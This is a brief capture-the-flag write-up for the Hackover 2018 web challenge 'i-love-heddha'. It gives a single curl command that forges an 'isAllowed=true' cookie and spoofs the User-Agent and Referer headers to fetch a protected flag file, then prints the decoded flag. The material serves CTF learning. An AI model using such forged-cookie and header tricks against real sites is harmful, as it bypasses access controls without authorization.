Tags: headers cookies 

*([Original write-up](https://security.meta.stackexchange.com/a/3083/95381) by [@rawsec](https://twitter.com/rawsec/))*

## i-love-heddha (web, 100)

A skiddo-friendly continuation of *ez web* that features some extra headers and `base64`.

```
$ curl -s --cookie "isAllowed=true" \
    --header "User-Agent: Builder browser 1.0.1" \
    --header "Referer: hackover.18" http://207.154.226.40:8080/flag/flag.txt \
    | base64 -d

hackover18{4ngryW3bS3rv3rS4ysN0}
```
